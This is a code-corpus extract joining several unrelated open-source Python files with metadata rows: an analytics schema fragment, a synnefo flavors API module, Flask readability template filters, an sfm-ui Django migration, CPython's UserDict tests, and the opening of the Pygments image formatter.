Column('marketing_campaignUuid', DataType.VARCHAR, length=2048, path='owen.context.marketing.campaignUuid'),
Column('marketing_cdRank', DataType.INT, path='owen.context.marketing.cdRank'),
Column('marketing_channel', DataType.VARCHAR, length=50, path='owen.context.marketing.channel'),
Column('marketing_content', DataType.VARCHAR, length=2048, path='owen.context.marketing.content'),
Column('marketing_medium', DataType.VARCHAR, length=50, path='owen.context.marketing.medium'),
Column('marketing_notificationUuid', DataType.VARCHAR, length=2048, path='owen.context.marketing.notificationUuid'),
Column('marketing_source', DataType.VARCHAR, length=100, path='owen.context.marketing.source'),
Column('marketing_term', DataType.VARCHAR, length=2048, path='owen.context.marketing.term'),
Column('marketing_vendor', DataType.VARCHAR, length=25, path='owen.context.marketing.vendor'),
Column('mobileDeviceMake', DataType.VARCHAR, length=25, path='owen.context.mobileDeviceMake'),
Column('mobileDeviceModel', DataType.VARCHAR, length=50, path='owen.context.mobileDeviceModel'),
Column('notificationEnabledFlag', DataType.BOOLEAN, path='owen.context.notificationEnabledFlag'),
Column('osFamily', DataType.VARCHAR, length=25, path='owen.context.osFamily'),
Column('osName', DataType.VARCHAR, length=2048, path='owen.context.osName'),
Column('osVersion', DataType.VARCHAR, length=2048, path='owen.context.osVersion'),
Column('pageName', DataType.VARCHAR, length=2048, path='owen.context.pageName'),
Column('pageType', DataType.VARCHAR, length=100, path='owen.context.pageType'),
Column('partialSearchTerm', DataType.VARCHAR, length=2048, path='owen.context.partialSearchTerm'),
Column('personalizationFlag', DataType.BOOLEAN, path='owen.context.personalizationFlag'),
Column('previousPageName', DataType.VARCHAR, length=2048, path='owen.context.previousPageName'),
Column('previousViewInstanceUuid', DataType.VARCHAR, length=2048, path='owen.context.previousViewInstanceUuid'),
Column('promptName', DataType.VARCHAR, length=2048, path='owen.context.promptName'),
Column('propertyName', DataType.VARCHAR, length=20, path='owen.context.propertyName'),
Column('referrer', DataType.VARCHAR, length=2048, path='owen.context.referrer'),
Column('region', DataType.VARCHAR, length=25, path='owen.context.region'),
Column('screenHeight', DataType.INT, path='owen.context.screenHeight'),
Column('screenWidth', DataType.INT, path='owen.context.screenWidth'),
Column('session', DataType.VARCHAR, length=2048, path='owen.context.session'),
Column('test_testUuid', DataType.VARCHAR, length=26, path='owen.context.test.testUuid'),
Column('udid', DataType.VARCHAR, length=40, path='owen.context.udid'),
Column('userAgent', DataType.VARCHAR, length=2048, path='owen.context.userAgent'),
Column('userQualifier', DataType.VARCHAR, length=26, path='owen.context.userQualifier'),
Column('userUuid', DataType.VARCHAR, length=2048, path='owen.context.userUuid'),
Column('vendorObject', DataType.VARCHAR, length=512, path='owen.context.vendor'),
Column('viewInstanceUuid', DataType.VARCHAR, length=128, path='owen.context.viewInstanceUuid'),
Column('eventAction', DataType.VARCHAR, length=2048, path='owen.event.eventAction'),
Column('eventCategory', DataType.VARCHAR, length=25, path='owen.event.eventCategory'),
Column('eventInstanceUuid', DataType.VARCHAR, length=26, path='owen.event.eventInstanceUuid'),
Column('eventName', DataType.VARCHAR, length=50, path='owen.event.eventName'),
Column('eventPlatform', DataType.VARCHAR, length=25, path='owen.event.eventPlatform'),
Column('eventPlatformVersion', DataType.VARCHAR, length=25, path='owen.event.eventPlatformVersion'),
Column('eventTarget', DataType.VARCHAR, length=2048, path='owen.event.eventTarget'),
Column('eventVersion', DataType.VARCHAR, length=25, path='owen.event.eventVersion'),
Column('eventTimestamp', DataType.DATETIME, date_pattern="yyyy-MM-dd'T'HH:mm:ss'Z'", path='owen.event.eventTimestamp'),
Column('derivedEventInstanceId', DataType.VARCHAR, length=64, path='metadata.derivedEventInstanceId'),
Column('owenProcessed', DataType.DATETIME, date_pattern="yyyy-MM-dd'T'HH:mm:ss'Z'", path='metadata.analyticsTopologyFinishTime'),
],
))))
print 'created dataset: %s' % dataset.id
| mit | 5,392,234,368,456,697,000 | 91.986928 | 143 | 0.694806 | false |
AthinaB/synnefo | snf-cyclades-app/synnefo/api/flavors.py | 9 | 3419 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from logging import getLogger
from django.conf.urls import patterns
from django.http import HttpResponse
from django.template.loader import render_to_string
from django.utils import simplejson as json
from snf_django.lib import api
from synnefo.api import util
from synnefo.db.models import Flavor
log = getLogger('synnefo.api')
urlpatterns = patterns(
'synnefo.api.flavors',
(r'^(?:/|.json|.xml)?$', 'list_flavors'),
(r'^/detail(?:.json|.xml)?$', 'list_flavors', {'detail': True}),
(r'^/(\d+)(?:.json|.xml)?$', 'get_flavor_details'),
)
def flavor_to_dict(flavor, detail=True):
d = {'id': flavor.id, 'name': flavor.name}
d['links'] = util.flavor_to_links(flavor.id)
if detail:
d['ram'] = flavor.ram
d['disk'] = flavor.disk
d['vcpus'] = flavor.cpu
d['SNF:disk_template'] = flavor.volume_type.disk_template
d['SNF:volume_type'] = flavor.volume_type_id
d['SNF:allow_create'] = flavor.allow_create
return d
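# Illustrative shape of the returned dict (values are hypothetical):
# {'id': 42, 'name': 'C2R2048D20', 'links': [...], 'ram': 2048, 'disk': 20,
#  'vcpus': 2, 'SNF:disk_template': 'drbd', 'SNF:volume_type': 3,
#  'SNF:allow_create': True}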
@api.api_method(http_method='GET', user_required=True, logger=log)
def list_flavors(request, detail=False):
# Normal Response Codes: 200, 203
# Error Response Codes: computeFault (400, 500),
# serviceUnavailable (503),
# unauthorized (401),
# badRequest (400),
# overLimit (413)
log.debug('list_flavors detail=%s', detail)
active_flavors = Flavor.objects.select_related("volume_type")\
.exclude(deleted=True)
flavors = [flavor_to_dict(flavor, detail)
for flavor in active_flavors.order_by('id')]
if request.serialization == 'xml':
data = render_to_string('list_flavors.xml', {
'flavors': flavors,
'detail': detail})
else:
data = json.dumps({'flavors': flavors})
return HttpResponse(data, status=200)
@api.api_method(http_method='GET', user_required=True, logger=log)
def get_flavor_details(request, flavor_id):
# Normal Response Codes: 200, 203
# Error Response Codes: computeFault (400, 500),
# serviceUnavailable (503),
# unauthorized (401),
# badRequest (400),
# itemNotFound (404),
# overLimit (413)
log.debug('get_flavor_details %s', flavor_id)
flavor = util.get_flavor(flavor_id, include_deleted=True)
flavordict = flavor_to_dict(flavor, detail=True)
if request.serialization == 'xml':
data = render_to_string('flavor.xml', {'flavor': flavordict})
else:
data = json.dumps({'flavor': flavordict})
return HttpResponse(data, status=200)
| gpl-3.0 | 8,546,614,988,723,968,000 | 34.614583 | 71 | 0.623867 | false |
Doteveryone/BetterJobAdverts | jobcert/filters.py | 1 | 1556 | from jobcert import app
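# The readability filters below bucket Flesch Reading Ease scores (0-100,
# higher means easier to read) into labels for the templates.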
@app.template_filter('readability_words')
def readability_words_filter(s):
    score = int(s)
    # Inclusive boundaries: with the old range() calls, boundary scores such
    # as 89, 79, 69, 59, 49 and 100 fell through to "Very Confusing".
    if 90 <= score <= 100:
        return "Very Easy"
    elif 80 <= score < 90:
        return "Easy"
    elif 70 <= score < 80:
        return "Fairly Easy"
    elif 60 <= score < 70:
        return "Standard"
    elif 50 <= score < 60:
        return "Fairly Difficult"
    elif 30 <= score < 50:
        return "Difficult"
    else:
        return "Very Confusing"
@app.template_filter('trafficlight_status')
def trafficlight_status_filter(s):
if s == 'clear':
return "success"
if s == 'unclear':
return "warning"
else:
return "alert"
@app.template_filter('boolean_status')
def boolean_status_filter(s):
if bool(s):
return "success"
else:
return "alert"
@app.template_filter('format_status')
def format_status_filter(s):
if s == 'yes':
return "success"
if s == 'incomplete':
return "warning"
else:
return "alert"
@app.template_filter('readability_status')
def readability_status_filter(s):
    score = int(s)
    # Same inclusive boundaries as readability_words_filter above.
    if 60 <= score <= 100:
        return "success"
    elif 30 <= score < 60:
        return "warning"
    else:
        return "alert"
@app.template_filter('gender_coded_status')
def gender_coded_status_filter(s):
if s in ('feminine-coded', 'strongly feminine-coded', 'neutral'):
return "success"
else:
return "warning" | agpl-3.0 | 6,541,564,765,748,464,000 | 24.52459 | 69 | 0.596401 | false |
gwu-libraries/sfm-ui | sfm/ui/migrations/0021_auto_20180712_1310.py | 2 | 10258 | # Generated by Django 2.0.7 on 2018-07-12 17:10
import django.contrib.auth.validators
from django.db import migrations, models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('ui', '0020_auto_20180608_1144'),
]
operations = [
migrations.AddField(
model_name='historicalcollection',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalcollectionset',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalcredential',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalseed',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AlterField(
model_name='collection',
name='end_date',
field=models.DateTimeField(blank=True, help_text='If blank, will continue until stopped.', null=True),
),
migrations.AlterField(
model_name='collection',
name='harvest_type',
field=models.CharField(choices=[('twitter_user_timeline', 'Twitter user timeline'), ('twitter_search', 'Twitter search'), ('twitter_filter', 'Twitter filter'), ('twitter_sample', 'Twitter sample'), ('tumblr_blog_posts', 'Tumblr blog posts'), ('flickr_user', 'Flickr user'), ('weibo_timeline', 'Weibo timeline')], max_length=255),
),
migrations.AlterField(
model_name='collection',
name='link',
field=models.CharField(blank=True, max_length=512, verbose_name='Public link'),
),
migrations.AlterField(
model_name='collection',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection name'),
),
migrations.AlterField(
model_name='collection',
name='schedule_minutes',
field=models.PositiveIntegerField(choices=[(1, 'One time harvest'), (30, 'Every 30 minutes'), (60, 'Every hour'), (240, 'Every 4 hours'), (720, 'Every 12 hours'), (1440, 'Every day'), (10080, 'Every week'), (40320, 'Every 4 weeks'), (5, 'Every 5 minutes')], default=10080, null=True, verbose_name='schedule'),
),
migrations.AlterField(
model_name='collection',
name='visibility',
field=models.CharField(choices=[('default', 'Group only'), ('local', 'All other users')], default='default', help_text='Who else can view and export from this collection. Select "All other users" to share with all Social Feed Manager users.', max_length=255),
),
migrations.AlterField(
model_name='collectionset',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection set name'),
),
migrations.AlterField(
model_name='credential',
name='name',
field=models.CharField(max_length=255, verbose_name='Credential name'),
),
migrations.AlterField(
model_name='credential',
name='platform',
field=models.CharField(choices=[('twitter', 'Twitter'), ('flickr', 'Flickr'), ('weibo', 'Weibo'), ('tumblr', 'Tumblr')], help_text='Platform name', max_length=255),
),
migrations.AlterField(
model_name='export',
name='errors',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='export',
name='export_format',
field=models.CharField(choices=[('xlsx', 'Excel (XLSX)'), ('csv', 'Comma separated values (CSV)'), ('tsv', 'Tab separated values (TSV)'), ('json_full', 'Full JSON'), ('json', 'JSON of limited fields'), ('dehydrate', 'Text file of identifiers (dehydrate)')], default='xlsx', max_length=10),
),
migrations.AlterField(
model_name='export',
name='export_segment_size',
            field=models.BigIntegerField(blank=True, choices=[(100000, '100,000'), (250000, '250,000'), (500000, '500,000'), (1000000, '1,000,000'), (None, 'Single file'), (100, '100')], default=250000, null=True),
),
migrations.AlterField(
model_name='export',
name='infos',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='export',
name='status',
field=models.CharField(choices=[('not requested', 'Not requested'), ('requested', 'Requested'), ('running', 'Running'), ('completed success', 'Success'), ('completed failure', 'Failure')], default='not requested', max_length=20),
),
migrations.AlterField(
model_name='export',
name='warnings',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='errors',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='infos',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='status',
field=models.CharField(choices=[('requested', 'Requested'), ('completed success', 'Success'), ('completed failure', 'Completed with errors'), ('running', 'Running'), ('stop requested', 'Stop requested'), ('stopping', 'Stopping'), ('voided', 'Voided'), ('skipped', 'Skipped'), ('paused', 'Paused')], default='requested', max_length=20),
),
migrations.AlterField(
model_name='harvest',
name='token_updates',
field=jsonfield.fields.JSONField(blank=True, default={}),
),
migrations.AlterField(
model_name='harvest',
name='uids',
field=jsonfield.fields.JSONField(blank=True, default={}),
),
migrations.AlterField(
model_name='harvest',
name='warnings',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='historicalcollection',
name='end_date',
field=models.DateTimeField(blank=True, help_text='If blank, will continue until stopped.', null=True),
),
migrations.AlterField(
model_name='historicalcollection',
name='harvest_type',
field=models.CharField(choices=[('twitter_user_timeline', 'Twitter user timeline'), ('twitter_search', 'Twitter search'), ('twitter_filter', 'Twitter filter'), ('twitter_sample', 'Twitter sample'), ('tumblr_blog_posts', 'Tumblr blog posts'), ('flickr_user', 'Flickr user'), ('weibo_timeline', 'Weibo timeline')], max_length=255),
),
migrations.AlterField(
model_name='historicalcollection',
name='link',
field=models.CharField(blank=True, max_length=512, verbose_name='Public link'),
),
migrations.AlterField(
model_name='historicalcollection',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection name'),
),
migrations.AlterField(
model_name='historicalcollection',
name='schedule_minutes',
field=models.PositiveIntegerField(choices=[(1, 'One time harvest'), (30, 'Every 30 minutes'), (60, 'Every hour'), (240, 'Every 4 hours'), (720, 'Every 12 hours'), (1440, 'Every day'), (10080, 'Every week'), (40320, 'Every 4 weeks'), (5, 'Every 5 minutes')], default=10080, null=True, verbose_name='schedule'),
),
migrations.AlterField(
model_name='historicalcollection',
name='visibility',
field=models.CharField(choices=[('default', 'Group only'), ('local', 'All other users')], default='default', help_text='Who else can view and export from this collection. Select "All other users" to share with all Social Feed Manager users.', max_length=255),
),
migrations.AlterField(
model_name='historicalcollectionset',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection set name'),
),
migrations.AlterField(
model_name='historicalcredential',
name='name',
field=models.CharField(max_length=255, verbose_name='Credential name'),
),
migrations.AlterField(
model_name='historicalcredential',
name='platform',
field=models.CharField(choices=[('twitter', 'Twitter'), ('flickr', 'Flickr'), ('weibo', 'Weibo'), ('tumblr', 'Tumblr')], help_text='Platform name', max_length=255),
),
migrations.AlterField(
model_name='user',
name='email_frequency',
field=models.CharField(choices=[('daily', 'Daily'), ('weekly', 'Weekly'), ('monthly', 'Monthly'), ('none', 'None')], default='daily', max_length=10),
),
migrations.AlterField(
model_name='user',
name='last_name',
field=models.CharField(blank=True, max_length=150, verbose_name='last name'),
),
migrations.AlterField(
model_name='user',
name='local_id',
field=models.CharField(blank=True, default='', help_text='Local identifier', max_length=255),
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username'),
),
]
| mit | -1,442,115,788,846,151,700 | 49.039024 | 347 | 0.586177 | false |
City-of-Helsinki/kuulemma | kuulemma/migrations/versions/14051cff79e_rename_hearing_section_to_alternative.py | 2 | 4084 | # -*- coding: utf-8 -*-
# Kuulemma
# Copyright (C) 2014, Fast Monkeys Oy
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Rename `hearing_section` to `alternative`"""
# revision identifiers, used by Alembic.
revision = '14051cff79e'
down_revision = '51051f5b195'
from alembic import op
def upgrade():
op.rename_table('hearing_section', 'alternative')
op.rename_table('hearing_section_version', 'alternative_version')
op.alter_column(
'comment',
'hearing_section_id',
new_column_name='alternative_id'
)
op.alter_column(
'image',
'hearing_section_id',
new_column_name='alternative_id'
)
op.alter_column(
'comment_version',
'hearing_section_id',
new_column_name='alternative_id'
)
op.create_index(op.f(
'ix_alternative_version_end_transaction_id'),
'alternative_version',
['end_transaction_id'],
unique=False
)
op.create_index(op.f(
'ix_alternative_version_operation_type'),
'alternative_version',
['operation_type'],
unique=False
)
op.create_index(op.f(
'ix_alternative_version_transaction_id'),
'alternative_version',
['transaction_id'],
unique=False
)
op.drop_index(
'ix_hearing_section_version_end_transaction_id',
table_name='alternative_version'
)
op.drop_index(
'ix_hearing_section_version_operation_type',
table_name='alternative_version'
)
op.drop_index(
'ix_hearing_section_version_transaction_id',
table_name='alternative_version'
)
op.create_index(
op.f('ix_image_alternative_id'),
'image',
['alternative_id'],
unique=False
)
op.drop_index(
'ix_image_hearing_section_id',
table_name='image'
)
def downgrade():
op.drop_index(
op.f('ix_image_alternative_id'),
table_name='image'
)
op.drop_index(
op.f('ix_alternative_version_transaction_id'),
table_name='alternative_version'
)
op.drop_index(
op.f('ix_alternative_version_operation_type'),
table_name='alternative_version'
)
op.drop_index(
op.f('ix_alternative_version_end_transaction_id'),
table_name='alternative_version'
)
op.rename_table('alternative', 'hearing_section')
op.rename_table('alternative_version', 'hearing_section_version')
op.alter_column(
'comment',
'alternative_id',
new_column_name='hearing_section_id'
)
op.alter_column(
'image',
'alternative_id',
new_column_name='hearing_section_id'
)
op.alter_column(
'comment_version',
'alternative_id',
new_column_name='hearing_section_id'
)
op.create_index(
'ix_image_hearing_section_id',
'image',
['hearing_section_id'],
unique=False
)
op.create_index(
'ix_hearing_section_version_transaction_id',
'hearing_section_version',
['transaction_id'],
unique=False
)
op.create_index(
'ix_hearing_section_version_operation_type',
'hearing_section_version',
['operation_type'],
unique=False
)
op.create_index(
'ix_hearing_section_version_end_transaction_id',
'hearing_section_version',
['end_transaction_id'],
unique=False
)
| agpl-3.0 | -8,511,520,248,250,662,000 | 25.519481 | 77 | 0.613369 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.0/Lib/test/test_userdict.py | 2 | 6470 | # Check every path through every method of UserDict
from test import support, mapping_tests
import collections
d0 = {}
d1 = {"one": 1}
d2 = {"one": 1, "two": 2}
d3 = {"one": 1, "two": 3, "three": 5}
d4 = {"one": None, "two": None}
d5 = {"one": 1, "two": 1}
class UserDictTest(mapping_tests.TestHashMappingProtocol):
type2test = collections.UserDict
def test_all(self):
# Test constructors
u = collections.UserDict()
u0 = collections.UserDict(d0)
u1 = collections.UserDict(d1)
u2 = collections.UserDict(d2)
uu = collections.UserDict(u)
uu0 = collections.UserDict(u0)
uu1 = collections.UserDict(u1)
uu2 = collections.UserDict(u2)
# keyword arg constructor
self.assertEqual(collections.UserDict(one=1, two=2), d2)
# item sequence constructor
self.assertEqual(collections.UserDict([('one',1), ('two',2)]), d2)
self.assertEqual(collections.UserDict(dict=[('one',1), ('two',2)]), d2)
# both together
self.assertEqual(collections.UserDict([('one',1), ('two',2)], two=3, three=5), d3)
# alternate constructor
self.assertEqual(collections.UserDict.fromkeys('one two'.split()), d4)
self.assertEqual(collections.UserDict().fromkeys('one two'.split()), d4)
self.assertEqual(collections.UserDict.fromkeys('one two'.split(), 1), d5)
self.assertEqual(collections.UserDict().fromkeys('one two'.split(), 1), d5)
self.assert_(u1.fromkeys('one two'.split()) is not u1)
self.assert_(isinstance(u1.fromkeys('one two'.split()), collections.UserDict))
self.assert_(isinstance(u2.fromkeys('one two'.split()), collections.UserDict))
# Test __repr__
self.assertEqual(str(u0), str(d0))
self.assertEqual(repr(u1), repr(d1))
self.assertEqual(repr(u2), repr(d2))
# Test __cmp__ and __len__
all = [d0, d1, d2, u, u0, u1, u2, uu, uu0, uu1, uu2]
for a in all:
for b in all:
self.assertEqual(a == b, len(a) == len(b))
# Test __getitem__
self.assertEqual(u2["one"], 1)
self.assertRaises(KeyError, u1.__getitem__, "two")
# Test __setitem__
u3 = collections.UserDict(u2)
u3["two"] = 2
u3["three"] = 3
# Test __delitem__
del u3["three"]
self.assertRaises(KeyError, u3.__delitem__, "three")
# Test clear
u3.clear()
self.assertEqual(u3, {})
# Test copy()
u2a = u2.copy()
self.assertEqual(u2a, u2)
u2b = collections.UserDict(x=42, y=23)
u2c = u2b.copy() # making a copy of a UserDict is special cased
self.assertEqual(u2b, u2c)
class MyUserDict(collections.UserDict):
def display(self): print(self)
m2 = MyUserDict(u2)
m2a = m2.copy()
self.assertEqual(m2a, m2)
# SF bug #476616 -- copy() of UserDict subclass shared data
m2['foo'] = 'bar'
self.assertNotEqual(m2a, m2)
# Test keys, items, values
self.assertEqual(u2.keys(), d2.keys())
self.assertEqual(u2.items(), d2.items())
self.assertEqual(list(u2.values()), list(d2.values()))
# Test "in".
for i in u2.keys():
self.assert_(i in u2)
self.assertEqual(i in u1, i in d1)
self.assertEqual(i in u0, i in d0)
# Test update
t = collections.UserDict()
t.update(u2)
self.assertEqual(t, u2)
# Test get
for i in u2.keys():
self.assertEqual(u2.get(i), u2[i])
self.assertEqual(u1.get(i), d1.get(i))
self.assertEqual(u0.get(i), d0.get(i))
# Test "in" iteration.
for i in range(20):
u2[i] = str(i)
ikeys = []
for k in u2:
ikeys.append(k)
keys = u2.keys()
self.assertEqual(set(ikeys), set(keys))
# Test setdefault
t = collections.UserDict()
self.assertEqual(t.setdefault("x", 42), 42)
self.assert_("x" in t)
self.assertEqual(t.setdefault("x", 23), 42)
# Test pop
t = collections.UserDict(x=42)
self.assertEqual(t.pop("x"), 42)
self.assertRaises(KeyError, t.pop, "x")
self.assertEqual(t.pop("x", 1), 1)
t["x"] = 42
self.assertEqual(t.pop("x", 1), 42)
# Test popitem
t = collections.UserDict(x=42)
self.assertEqual(t.popitem(), ("x", 42))
self.assertRaises(KeyError, t.popitem)
def test_missing(self):
# Make sure UserDict doesn't have a __missing__ method
self.assertEqual(hasattr(collections.UserDict, "__missing__"), False)
# Test several cases:
# (D) subclass defines __missing__ method returning a value
# (E) subclass defines __missing__ method raising RuntimeError
# (F) subclass sets __missing__ instance variable (no effect)
# (G) subclass doesn't define __missing__ at a all
class D(collections.UserDict):
def __missing__(self, key):
return 42
d = D({1: 2, 3: 4})
self.assertEqual(d[1], 2)
self.assertEqual(d[3], 4)
self.assert_(2 not in d)
self.assert_(2 not in d.keys())
self.assertEqual(d[2], 42)
class E(collections.UserDict):
def __missing__(self, key):
raise RuntimeError(key)
e = E()
try:
e[42]
except RuntimeError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("e[42] didn't raise RuntimeError")
class F(collections.UserDict):
def __init__(self):
# An instance variable __missing__ should have no effect
self.__missing__ = lambda key: None
collections.UserDict.__init__(self)
f = F()
try:
f[42]
except KeyError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("f[42] didn't raise KeyError")
class G(collections.UserDict):
pass
g = G()
try:
g[42]
except KeyError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("g[42] didn't raise KeyError")
def test_main():
support.run_unittest(
UserDictTest,
)
if __name__ == "__main__":
test_main()
| mit | -4,867,743,210,431,964,000 | 31.676768 | 90 | 0.547759 | false |
PatKayongo/patkayongo.github.io | node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/formatters/img.py | 94 | 18053 | # -*- coding: utf-8 -*-
"""
pygments.formatters.img
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for Pixmap output.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
from pygments.formatter import Formatter
from pygments.util import get_bool_opt, get_int_opt, \
get_list_opt, get_choice_opt
# Import this carefully
try:
from PIL import Image, ImageDraw, ImageFont
pil_available = True
except ImportError:
pil_available = False
try:
import winreg
except ImportError:
    winreg = None  # not available outside Windows; the registry code is never reached there
__all__ = ['ImageFormatter', 'GifImageFormatter', 'JpgImageFormatter',
'BmpImageFormatter']
# For some unknown reason every font calls it something different
STYLES = {
'NORMAL': ['', 'Roman', 'Book', 'Normal', 'Regular', 'Medium'],
'ITALIC': ['Oblique', 'Italic'],
'BOLD': ['Bold'],
'BOLDITALIC': ['Bold Oblique', 'Bold Italic'],
}
# A sane default for modern systems
DEFAULT_FONT_NAME_NIX = 'Bitstream Vera Sans Mono'
DEFAULT_FONT_NAME_WIN = 'Courier New'
class PilNotAvailable(ImportError):
"""When Python imaging library is not available"""
class FontNotFound(Exception):
"""When there are no usable fonts specified"""
class FontManager(object):
"""
Manages a set of fonts: normal, italic, bold, etc...
"""
def __init__(self, font_name, font_size=14):
self.font_name = font_name
self.font_size = font_size
self.fonts = {}
self.encoding = None
if sys.platform.startswith('win'):
if not font_name:
self.font_name = DEFAULT_FONT_NAME_WIN
self._create_win()
else:
if not font_name:
self.font_name = DEFAULT_FONT_NAME_NIX
self._create_nix()
def _get_nix_font_path(self, name, style):
from subprocess import getstatusoutput
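        # fc-list emits one matching font file per line, typically in the
        # form "/path/to/font.ttf: " -- hence the strip(':') below.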
exit, out = getstatusoutput('fc-list "%s:style=%s" file' %
(name, style))
if not exit:
lines = out.splitlines()
if lines:
path = lines[0].strip().strip(':')
return path
def _create_nix(self):
for name in STYLES['NORMAL']:
path = self._get_nix_font_path(self.font_name, name)
if path is not None:
self.fonts['NORMAL'] = ImageFont.truetype(path, self.font_size)
break
else:
raise FontNotFound('No usable fonts named: "%s"' %
self.font_name)
for style in ('ITALIC', 'BOLD', 'BOLDITALIC'):
for stylename in STYLES[style]:
path = self._get_nix_font_path(self.font_name, stylename)
if path is not None:
self.fonts[style] = ImageFont.truetype(path, self.font_size)
break
else:
if style == 'BOLDITALIC':
self.fonts[style] = self.fonts['BOLD']
else:
self.fonts[style] = self.fonts['NORMAL']
def _lookup_win(self, key, basename, styles, fail=False):
for suffix in ('', ' (TrueType)'):
for style in styles:
try:
valname = '%s%s%s' % (basename, style and ' '+style, suffix)
val, _ = winreg.QueryValueEx(key, valname)
return val
except EnvironmentError:
continue
else:
if fail:
raise FontNotFound('Font %s (%s) not found in registry' %
(basename, styles[0]))
return None
def _create_win(self):
try:
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r'Software\Microsoft\Windows NT\CurrentVersion\Fonts')
except EnvironmentError:
try:
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r'Software\Microsoft\Windows\CurrentVersion\Fonts')
except EnvironmentError:
raise FontNotFound('Can\'t open Windows font registry key')
try:
path = self._lookup_win(key, self.font_name, STYLES['NORMAL'], True)
self.fonts['NORMAL'] = ImageFont.truetype(path, self.font_size)
for style in ('ITALIC', 'BOLD', 'BOLDITALIC'):
path = self._lookup_win(key, self.font_name, STYLES[style])
if path:
self.fonts[style] = ImageFont.truetype(path, self.font_size)
else:
if style == 'BOLDITALIC':
self.fonts[style] = self.fonts['BOLD']
else:
self.fonts[style] = self.fonts['NORMAL']
finally:
winreg.CloseKey(key)
def get_char_size(self):
"""
Get the character size.
"""
return self.fonts['NORMAL'].getsize('M')
def get_font(self, bold, oblique):
"""
Get the font based on bold and italic flags.
"""
if bold and oblique:
return self.fonts['BOLDITALIC']
elif bold:
return self.fonts['BOLD']
elif oblique:
return self.fonts['ITALIC']
else:
return self.fonts['NORMAL']
class ImageFormatter(Formatter):
"""
Create a PNG image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 0.10.*
Additional options accepted:
`image_format`
An image format to output to that is recognised by PIL, these include:
* "PNG" (default)
* "JPEG"
* "BMP"
* "GIF"
`line_pad`
The extra spacing (in pixels) between each line of text.
Default: 2
`font_name`
The font name to be used as the base font from which others, such as
bold and italic fonts will be generated. This really should be a
monospace font to look sane.
Default: "Bitstream Vera Sans Mono"
`font_size`
The font size in points to be used.
Default: 14
`image_pad`
The padding, in pixels to be used at each edge of the resulting image.
Default: 10
`line_numbers`
Whether line numbers should be shown: True/False
Default: True
`line_number_start`
The line number of the first line.
Default: 1
`line_number_step`
The step used when printing line numbers.
Default: 1
`line_number_bg`
The background colour (in "#123456" format) of the line number bar, or
None to use the style background color.
Default: "#eed"
`line_number_fg`
The text color of the line numbers (in "#123456"-like format).
Default: "#886"
`line_number_chars`
The number of columns of line numbers allowable in the line number
margin.
Default: 2
`line_number_bold`
Whether line numbers will be bold: True/False
Default: False
`line_number_italic`
Whether line numbers will be italicized: True/False
Default: False
`line_number_separator`
Whether a line will be drawn between the line number area and the
source code area: True/False
Default: True
`line_number_pad`
The horizontal padding (in pixels) between the line number margin, and
the source code area.
Default: 6
`hl_lines`
Specify a list of lines to be highlighted. *New in Pygments 1.2.*
Default: empty list
`hl_color`
Specify the color for highlighting lines. *New in Pygments 1.2.*
Default: highlight color of the selected style
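
    Usage sketch (illustrative, not part of this module; it assumes the
    standard ``pygments.highlight`` entry point and that PIL is installed)::

        from pygments import highlight
        from pygments.lexers import PythonLexer
        from pygments.formatters import ImageFormatter

        with open('out.png', 'wb') as f:
            highlight('print("hi")', PythonLexer(),
                      ImageFormatter(font_size=16, line_numbers=True), f)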
"""
# Required by the pygments mapper
name = 'img'
aliases = ['img', 'IMG', 'png']
filenames = ['*.png']
unicodeoutput = False
default_image_format = 'png'
def __init__(self, **options):
"""
See the class docstring for explanation of options.
"""
if not pil_available:
raise PilNotAvailable(
'Python Imaging Library is required for this formatter')
Formatter.__init__(self, **options)
# Read the style
